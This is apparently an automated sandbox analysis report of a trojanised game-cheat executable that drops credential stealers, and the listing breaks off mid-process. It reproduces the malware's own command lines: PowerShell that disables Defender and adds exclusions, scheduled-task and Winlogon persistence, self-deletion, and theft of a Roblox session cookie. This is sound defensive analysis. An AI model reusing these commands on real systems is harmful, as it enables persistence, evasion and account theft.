Analysis
Max time kernel: 48s
Max time network: 50s
Platform: windows10-2004_x64
Resource: win10v2004-20240611-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 12-06-2024 19:15
Behavioral task: behavioral1
Sample: PowerCheat free.exe
Resource: win10v2004-20240611-en
General
Target: PowerCheat free.exe
Size: 8.0MB
MD5: 63e3124b3360f64808cddb6b5b7dd0b7
SHA1: b5308a58f50c548c66b1c46543537812605b6973
SHA256: 3e96e5c7ce88b7a27dbdb0341fe7dc7edd69cfeaba35b7b3019731de8ed81840
SHA512: f57876faf30d4c5e8794bf5e1c70747ca58c629df54f121339cbb6444df2cfa13315952233e32471448b5c919b62147ea70af7d66262ce1658fd9d87cea06f4f
SSDEEP: 196608:o/TYUOztYQC4wmOH2dWJMiUb5zBXVnTpkSIgzeRnZYk:kWzupHjJdwbdkSpzYZYk
Malware Config
Signatures
AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.
Detect Umbral payload (3 IoCs)
  Resource | YARA rule
  behavioral1/files/0x0007000000023573-27.dat | family_umbral
  behavioral1/memory/1104-37-0x0000000000400000-0x0000000000C0F000-memory.dmp | family_umbral
  behavioral1/memory/4896-35-0x000002153CC80000-0x000002153CCC0000-memory.dmp | family_umbral
Modifies WinLogon for persistence (2 TTPs, 1 IoC)
  Description | IoC | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\firefox.exe" | PowerCheatEmuHider.exe
AgentTesla payload (1 IoC)
  Resource | YARA rule
  behavioral1/memory/2396-43-0x000002884C1E0000-0x000002884C3F4000-memory.dmp | family_agenttesla
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
  PID | Process
  1968 | powershell.exe
Drops file in Drivers directory (1 IoC)
  Description | IoC | Process
  File opened for modification | C:\Windows\System32\drivers\etc\hosts | ldld.exe
Modifies AppInit DLL entries (2 TTPs)
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence check.
  Description | IoC | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | PowerCheat free.exe
Executes dropped EXE (3 IoCs)
  PID | Process
  2396 | PowerCheat_free.exe
  4608 | PowerCheatEmuHider.exe
  4896 | ldld.exe
Loads dropped DLL (15 IoCs)
  PID | Process
  5532 | Process not Found
  6132 | Process not Found
  1552 | Process not Found
  5432 | Process not Found
  5320 | WmiApSrv.exe
  1272 | wmiprvse.exe
  6072 | Process not Found
  6100 | Process not Found
  2420 | Process not Found
  5476 | Process not Found
  6864 | Process not Found
  6384 | Process not Found
  7080 | Process not Found
  6660 | Process not Found
  4976 | Process not Found
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials.
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  Flow | IoC
  75 | discord.com
  76 | discord.com
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
  Flow | IoC
  4 | ip-api.com
Drops file in Windows directory (3 IoCs)
  Description | IoC | Process
  File created | C:\Windows\xdwd.dll | PowerCheatEmuHider.exe
  File created | C:\Windows\conshost.exe | PowerCheatEmuHider.exe
  File opened for modification | C:\Windows\conshost.exe | PowerCheatEmuHider.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments.
  Description | IoC | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | firefox.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Creates scheduled task(s) (1 TTP, 13 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  PID | Process
  6124 | schtasks.exe
  5320 | schtasks.exe
  5260 | schtasks.exe
  5572 | schtasks.exe
  3068 | schtasks.exe
  4264 | schtasks.exe
  7148 | schtasks.exe
  6752 | schtasks.exe
  6092 | schtasks.exe
  6936 | schtasks.exe
  6460 | schtasks.exe
  5276 | schtasks.exe
  5444 | schtasks.exe
Detects videocard installed (1 TTP, 1 IoC)
Uses WMIC.exe to determine the installed video card.
  PID | Process
  2864 | wmic.exe
Enumerates system info in registry (2 TTPs, 6 IoCs)
  Description | IoC | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | PowerCheat_free.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | PowerCheat_free.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | PowerCheat_free.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Modifies registry class (1 IoC)
  Description | IoC | Process
  Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings | firefox.exe
Runs ping.exe (1 TTP, 1 IoC)
  PID | Process
  5604 | PING.EXE
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  PID | Process | Consecutive occurrences (in report order)
  4896 | ldld.exe | 1
  1968 | powershell.exe | 2
  2396 | PowerCheat_free.exe | 2
  2052 | powershell.exe | 2
  2396 | PowerCheat_free.exe | 2
  3504 | powershell.exe | 3
  4800 | msedge.exe | 2
  2396 | PowerCheat_free.exe | 3
  2932 | msedge.exe | 2
  2396 | PowerCheat_free.exe | 5
  6072 | powershell.exe | 3
  2396 | PowerCheat_free.exe | 2
  5276 | powershell.exe | 3
  2396 | PowerCheat_free.exe | 3
  220 | identity_helper.exe | 2
  2396 | PowerCheat_free.exe | 16
  4608 | PowerCheatEmuHider.exe | 2
  2396 | PowerCheat_free.exe | 2
  4608 | PowerCheatEmuHider.exe | 7
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (7 IoCs)
  PID | Process | Occurrences
  2932 | msedge.exe | 7
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Token | PID | Process
  SeDebugPrivilege | 4608 | PowerCheatEmuHider.exe
  SeDebugPrivilege | 4896 | ldld.exe
  SeDebugPrivilege | 2396 | PowerCheat_free.exe
  SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (this sequence of 21 tokens is listed twice) | 4588 | wmic.exe
  SeDebugPrivilege | 1968 | powershell.exe
  SeDebugPrivilege | 2052 | powershell.exe
  SeDebugPrivilege | 3504 | powershell.exe
  SeDebugPrivilege (listed twice) | 1316 | firefox.exe
  SeDebugPrivilege | 6072 | powershell.exe
  SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege | 5696 | wmic.exe
Suspicious use of FindShellTrayWindow (29 IoCs)
  PID | Process | Consecutive occurrences (in report order)
  2932 | msedge.exe | 17
  1316 | firefox.exe | 4
  2932 | msedge.exe | 8
Suspicious use of SendNotifyMessage (27 IoCs)
  PID | Process | Consecutive occurrences (in report order)
  2932 | msedge.exe | 16
  1316 | firefox.exe | 3
  2932 | msedge.exe | 8
Suspicious use of SetWindowsHookEx (1 IoC)
  PID | Process
  1316 | firefox.exe
Suspicious use of WriteProcessMemory (64 IoCs)
  Description | PID | Process | procid_target | Occurrences
  PID 1104 wrote to memory of 2396 | 1104 | PowerCheat free.exe | 84 | 2
  PID 1104 wrote to memory of 4608 | 1104 | PowerCheat free.exe | 86 | 2
  PID 1104 wrote to memory of 4896 | 1104 | PowerCheat free.exe | 87 | 2
  PID 4896 wrote to memory of 4588 | 4896 | ldld.exe | 89 | 2
  PID 4896 wrote to memory of 1376 | 4896 | ldld.exe | 92 | 2
  PID 4896 wrote to memory of 1968 | 4896 | ldld.exe | 94 | 2
  PID 4896 wrote to memory of 2052 | 4896 | ldld.exe | 96 | 2
  PID 4896 wrote to memory of 3504 | 4896 | ldld.exe | 100 | 2
  PID 3308 wrote to memory of 1316 | 3308 | firefox.exe | 102 | 11
  PID 2396 wrote to memory of 2932 | 2396 | PowerCheat_free.exe | 103 | 2
  PID 2932 wrote to memory of 5048 | 2932 | msedge.exe | 104 | 2
  PID 1316 wrote to memory of 3556 | 1316 | firefox.exe | 105 | 33
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Views/modifies file attributes (1 TTP, 1 IoC)
  PID | Process
  1376 | attrib.exe
Processes
[1] C:\Users\Admin\AppData\Local\Temp\PowerCheat free.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\PowerCheat free.exe"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID: 1104
    [2] C:\Users\Admin\AppData\Local\Temp\PowerCheat_free.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\PowerCheat_free.exe"
        - Executes dropped EXE
        - Enumerates system info in registry
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 2396
        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/powergirlso2
            - Enumerates system info in registry
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of SendNotifyMessage
            - Suspicious use of WriteProcessMemory
            PID: 2932
            [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa0d8846f8,0x7ffa0d884708,0x7ffa0d884718
                PID: 5048
            [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
                PID: 4652
            [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
                - Suspicious behavior: EnumeratesProcesses
                PID: 4800
            [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2524 /prefetch:8
                PID: 456
            [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
                PID: 1552
            [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                PID: 736
            [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
                PID: 5556
            [4] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8
                PID: 4656
            [4] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8
                - Suspicious behavior: EnumeratesProcesses
                PID: 220
            [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5016 /prefetch:1
                PID: 5316
            [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
                PID: 5692
            [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
                PID: 1988
            [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8987458513961644641,13139856672144843500,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1
                PID: 3660
    [2] C:\Users\Admin\AppData\Local\Temp\PowerCheatEmuHider.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\PowerCheatEmuHider.exe"
        - Modifies WinLogon for persistence
        - Executes dropped EXE
        - Drops file in Windows directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 4608
        [3] C:\Windows\SYSTEM32\CMD.exe
            Command line: "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "conhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" & exit
            PID: 1668
            [4] C:\Windows\system32\schtasks.exe
                Command line: SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "conhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe"
                - Creates scheduled task(s)
                PID: 5276
        [3] C:\Windows\SYSTEM32\CMD.exe
            Command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
            PID: 5316
            [4] C:\Windows\System32\Conhost.exe
                Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                PID: 4524
            [4] C:\Windows\system32\schtasks.exe
                Command line: SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
                - Creates scheduled task(s)
                PID: 5260
        [3] C:\Windows\SYSTEM32\CMD.exe
            Command line: "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "dllhost" /tr "C:\Windows\conshost.exe" /RL HIGHEST & exit
            PID: 1272
            [4] C:\Windows\system32\schtasks.exe
                Command line: SchTaSKs /create /f /sc minute /mo 5 /tn "dllhost" /tr "C:\Windows\conshost.exe" /RL HIGHEST
                - Creates scheduled task(s)
                PID: 6092
        [3] C:\Windows\SYSTEM32\CMD.exe
            Command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
            PID: 4008
            [4] C:\Windows\system32\schtasks.exe
                Command line: SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
                - Creates scheduled task(s)
                PID: 5572
        [3] C:\Windows\SYSTEM32\CMD.exe
            Command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
            PID: 5556
            [4] C:\Windows\system32\schtasks.exe
                Command line: SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
                - Creates scheduled task(s)
                PID: 6124
        [3] C:\Windows\SYSTEM32\CMD.exe
            Command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
            PID: 6132
            [4] C:\Windows\system32\schtasks.exe
                Command line: SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
                - Creates scheduled task(s)
                PID: 5320
        [3] C:\Windows\SYSTEM32\CMD.exe
            Command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
            PID: 5276
            [4] C:\Windows\system32\schtasks.exe
                Command line: SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
                - Creates scheduled task(s)
                PID: 4264
        [3] C:\Windows\SYSTEM32\CMD.exe
            Command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
            PID: 6100
            [4] C:\Windows\system32\schtasks.exe
                Command line: SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
                - Creates scheduled task(s)
                PID: 5444
        [3] C:\Windows\SYSTEM32\CMD.exe
            Command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
            PID: 6840
            [4] C:\Windows\system32\schtasks.exe
                Command line: SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
                - Creates scheduled task(s)
                PID: 6936
        [3] C:\Windows\SYSTEM32\CMD.exe
            Command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
            PID: 6360
            [4] C:\Windows\system32\schtasks.exe
                Command line: SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
                - Creates scheduled task(s)
                PID: 6460
        [3] C:\Windows\SYSTEM32\CMD.exe
            Command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
            PID: 7036
            [4] C:\Windows\system32\schtasks.exe
                Command line: SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
                - Creates scheduled task(s)
                PID: 7148
        [3] C:\Windows\SYSTEM32\CMD.exe
            Command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
            PID: 6652
            [4] C:\Windows\system32\schtasks.exe
                Command line: SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
                - Creates scheduled task(s)
                PID: 6752
        [3] C:\Windows\SYSTEM32\CMD.exe
            Command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
            PID: 6924
            [4] C:\Windows\system32\schtasks.exe
                Command line: SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
                - Creates scheduled task(s)
                PID: 3068
    [2] C:\Users\Admin\AppData\Local\Temp\ldld.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\ldld.exe"
        - Drops file in Drivers directory
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 4896
        [3] C:\Windows\System32\Wbem\wmic.exe
            Command line: "wmic.exe" csproduct get uuid
            - Suspicious use of AdjustPrivilegeToken
            PID: 4588
        [3] C:\Windows\SYSTEM32\attrib.exe
            Command line: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\ldld.exe"
            - Views/modifies file attributes
            PID: 1376
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ldld.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 1968
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 2052
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 3504
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 6072
        [3] C:\Windows\System32\Wbem\wmic.exe
            Command line: "wmic.exe" os get Caption
            - Suspicious use of AdjustPrivilegeToken
            PID: 5696
        [3] C:\Windows\System32\Wbem\wmic.exe
            Command line: "wmic.exe" computersystem get totalphysicalmemory
            PID: 4392
        [3] C:\Windows\System32\Wbem\wmic.exe
            Command line: "wmic.exe" csproduct get uuid
            PID: 4524
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            - Suspicious behavior: EnumeratesProcesses
            PID: 5276
        [3] C:\Windows\System32\Wbem\wmic.exe
            Command line: "wmic" path win32_VideoController get name
            - Detects videocard installed
            PID: 2864
        [3] C:\Windows\SYSTEM32\cmd.exe
            Command line: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\ldld.exe" && pause
            PID: 5184
            [4] C:\Windows\system32\PING.EXE
                Command line: ping localhost
                - Runs ping.exe
                PID: 5604
[1] C:\Program Files\Mozilla Firefox\firefox.exe
    Command line: "C:\Program Files\Mozilla Firefox\firefox.exe"
    - Suspicious use of WriteProcessMemory
    PID: 3308
    [2] C:\Program Files\Mozilla Firefox\firefox.exe
        Command line: "C:\Program Files\Mozilla Firefox\firefox.exe"
        - Checks processor information in registry
        - Modifies registry class
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        PID: 1316
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.0.1278140845\1218399133" -parentBuildID 20230214051806 -prefsHandle 1740 -prefMapHandle 1732 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a77af659-824e-4e80-a1bd-519393fe0950} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 1840 28562c0be58 gpu
            PID: 3556
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.1.1296331901\1002623602" -parentBuildID 20230214051806 -prefsHandle 2428 -prefMapHandle 2416 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {634e83c5-9e65-41f5-8fdc-22d951de14ea} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 2456 28555e85658 socket
            PID: 1380
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.2.1923101871\146588282" -childID 1 -isForBrowser -prefsHandle 3164 -prefMapHandle 3160 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 896 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {675cf94c-3edb-4330-b325-85e1e44401ba} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 3176 28561b90358 tab
            PID: 1296
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
